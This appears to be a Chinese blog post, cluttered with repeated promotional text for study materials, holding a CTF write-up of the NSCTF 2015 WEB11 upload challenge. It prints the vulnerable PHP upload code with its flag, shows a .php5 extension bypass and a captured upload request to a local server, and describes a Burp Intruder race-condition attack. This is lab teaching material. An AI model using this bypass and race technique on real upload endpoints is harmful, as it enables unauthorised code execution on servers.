最新CTF-【NSCTF 2015】WEB11 条件竞争_nsctf 2015 web(2),彻底帮你搞懂

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  return true;

}

return false;

}
?>


我进行了一点修改,背景图片改为了同级目录,改为了png,表单action为空,不再跳转,方便你们看。



NSCTF


请上传文件!





<?php error_reporting(0); if(isset($_POST['submit'])){ $savefile = $_FILES['file']['name']; $savefile = preg_replace("/\.\.|\%/", "", $savefile); $tempfile = $_FILES['file']['tmp_name']; $savefile = preg_replace("/(php|phtml|php3|php4|jsp|exe|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i", "_\\1\\2", $savefile); $savefile = 'upload/'.$savefile; if(move_uploaded_file($tempfile,$savefile)){ $filename = $savefile; if(file_exists($filename) && ( (substr($savefile, -5) == '.php5') )){ file_put_contents($filename, "flag:{NSCTF_8f0fc74ddf786103ed56d20af3bf269}"); sleep(0.5); unlink($filename); exit('上传成功,文件地址为:'.$savefile."
"."但是系统检测到恶意上传立马又被删了~"); }else{ unlink($filename); exit('上传成功,文件地址为:'.$savefile."
"); } }else{ exit('上传失败~'."
"); } } function upload($src,$dst){ if(move_uploaded_file($src,$dst)){ return true; } return false; } ?>

**正则表达式分析**


"/\.\.|\%/",\表示转义,|表示或,故可匹配".."或者"%",配合preg\_replace替换为空。


"/(php|phtml|php3|php4|jsp|exe|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i",()内包含一个正则表达式,|表示或,\表示转义,i表示匹配时不区分大小写,故可匹配两个()加上"."或"$",配合preg\_replace替换为"\_()()",可能表达的不清楚,举个例子,"xxx.php"会被改为"xxx.\_php",不会写入flag,xxx.php.php3会被改为"xxx.\_php\_php3"。


后面if语句可以看到,文件后缀是".php5"就可以了。


## 复现


将上述代码保存到本地,例如,phpStudy的WWW目录下(D:\phpStudy\WWW\CTFs\NSCTF\2015WEB\_condition\_race.php)。同级目录下建立一个upload文件夹,放一张dot.png。




![](https://img-blog.csdnimg.cn/20201218172017741.PNG)

 网站结构 
 


打开phpStudy,使用浏览器访问。




![](https://img-blog.csdnimg.cn/20201218171913390.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70)

 未上传时 
 


 


## 攻击


通过正则表达式,可知使用后缀为.php5的文件可绕过,上传成功截图如下:




![](https://img-blog.csdnimg.cn/20201218172130689.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70)

 上传文件成功 
 


使用BP抓包



> 
> POST /CTFs/NSCTF/index.php HTTP/1.1  
>  Host: 127.0.0.1  
>  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0  
>  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8  
>  Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
>  Accept-Encoding: gzip, deflate  
>  Content-Type: multipart/form-data; boundary=---------------------------132767563241187676712547406197  
>  Content-Length: 353  
>  Origin: http://127.0.0.1  
>  Connection: close  
>  Referer: http://127.0.0.1/CTFs/NSCTF/2015WEB\_condition\_race.php  
>  Upgrade-Insecure-Requests: 1
> 
> 
> -----------------------------132767563241187676712547406197  
>  Content-Disposition: form-data; name="file"; filename="flag.php5"  
>  Content-Type: application/octet-stream
> 
> 
>   
>  -----------------------------132767563241187676712547406197  
>  Content-Disposition: form-data; name="submit"
> 
> 
> upload  
>  -----------------------------132767563241187676712547406197--
> 
> 
> 


在Instruder模块进行条件竞争攻击,即不断上传文件,导致系统来不及删,在攻击过程中服务器一直存在文件。




![](https://img-blog.csdnimg.cn/20201221153751291.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70)

 刷新发现 
 


## 学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

  • 10
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值